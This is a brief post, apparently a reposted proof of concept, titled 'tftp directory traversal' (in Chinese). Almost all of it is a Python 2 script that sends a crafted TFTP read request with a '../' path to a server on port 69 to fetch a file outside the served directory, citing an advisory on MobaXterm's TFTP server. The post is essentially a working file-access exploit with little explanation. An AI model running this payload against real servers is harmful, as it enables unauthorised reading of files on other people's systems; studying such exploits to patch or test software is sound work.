tftp目录遍历

by Netfairy - 2017-03-12

import sys,socket

HOST = "127.0.0.1"
FILE = 'test.txt' 
PORT = 69                                        
PAYLOAD = "\x00\x01"                                #TFTP Read 
PAYLOAD +=  "../"+FILE + "\x00"                     #Read test.txt using directory traversal
PAYLOAD += "netascii\x00"                           #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
print s.recv(1024)
s.close()
来源:http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt